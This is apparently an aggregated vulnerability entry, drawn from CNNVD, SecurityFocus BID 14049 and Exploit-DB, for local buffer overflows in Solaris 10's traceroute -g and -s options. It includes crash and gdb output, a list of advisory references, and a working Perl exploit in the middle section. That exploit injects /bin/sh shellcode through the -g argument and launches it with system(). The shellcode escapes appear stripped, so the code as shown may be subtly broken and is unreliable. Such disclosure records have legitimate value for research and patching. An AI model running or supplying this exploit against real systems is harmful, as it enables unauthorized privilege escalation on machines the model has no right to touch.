https://www.exploit-db.com/exploits/25896
https://www.securityfocus.com/bid/14049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-238

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。Solaris10的/usr/sbin/traceroute在处理-g参数时存在缓冲区溢出，本地攻击者可能利用此漏洞提升自己在系统中的权限。提供-g参数后，IP地址参数会覆盖返回地址：atari:root:/home/venglin#/usr/sbin/traceroute-g1-g2-g3-g4-g5-g6-g7-g8-g9-g10127.0.0.1traceroute:toomanyIPv4gatewaystraceroute:unknownIPv4host1tracerouteto127.0.0.1(127.0.0.1)，30hopsmax，88bytepacketsSegmentationfault(coredumped)atari:root:/home/venglin#gdb/usr/sbin/traceroutecore[…]Corewasgeneratedby`/usr/sbin/traceroute-g1-g2-g3-g4-g5-g6-g7-g8-g9-g10127.0.0′.Programterminatedwithsignal11，Segmentationfault.[…]#00x0100007fin??()0x0100007f是127.0.0.1。攻击者可以利用这个漏洞运行任意代码。但由于使用__init_suid_priv()，因此漏洞影响仅限于原始套接字访问。此外畸形的-s参数还可能导致堆破坏：atari:root:/home/venglin#gdb/usr/sbin/traceroutecore[…]#00xfee7178din_free_unlocked()from/lib/libc.so.1(gdb)bt#00xfee7178din_free_unlocked()from/lib/libc.so.1#10xfee71752infree()from/lib/libc.so.1#20xfefa49a6infreeaddrinfo()from/lib/libsocket.so.1#30x08052a7ainmain()

source: http://www.securityfocus.com/bid/14049/info

Sun Solaris traceroute is affected by multiple local buffer overflow vulnerabilities.

These vulnerabilities present themselves when the application handles excessive data supplied through command line arguments.

These issue are reported to affect /usr/sbin/traceroute running on Sun Solaris 10.

Some reports indicate that this issue cannot be reproduced. It is also reported that this issue is only exploitable on the Solaris x86 platform. 

#!/usr/bin/perl

$ret = 0x8046bb0;  # heap, solaris on amd64

$shellcode = "A" x 5000 .
"xb8xffxf8xffx3cxf7xd0x50x31xc0xb0x9ax50x89xe5x31xc0x50x68x2fx2fx73x68x68/binx89xe3x50x53x89xe2x50x52x53xb0x3bxffxd5";

$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &
0xff0000) >> 16, ($ret & 0xff000000) >> 24);

$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8
-g 9 -g 10 $ip";

print $cmd, "n";

system($cmd);

Sun Solaris 10.0_x86

Sun Solaris 10

来源:BID
名称:14049
链接:http://www.securityfocus.com/bid/14049
来源:VUPEN
名称:ADV-2005-2564
链接:http://www.frsirt.com/english/advisories/2005/2564
来源:SUNALERT
名称:102060
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102060-1
来源:SECTRACK
名称:1015261
链接:http://securitytracker.com/id?1015261
来源:SECUNIA
名称:17708
链接:http://secunia.com/advisories/17708
来源:BUGTRAQ
名称:20050624Re:Solaris10/usr/sbin/traceroutevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111964580023012&w;=2
来源:BUGTRAQ
名称:20050624Re:[Full-disclosure]Solaris10/usr/sbin/traceroutevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111963809801731&w;=2
来源:BUGTRAQ
名称:20050624Solaris10/usr/sbin/traceroutevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111963068714114&w;=2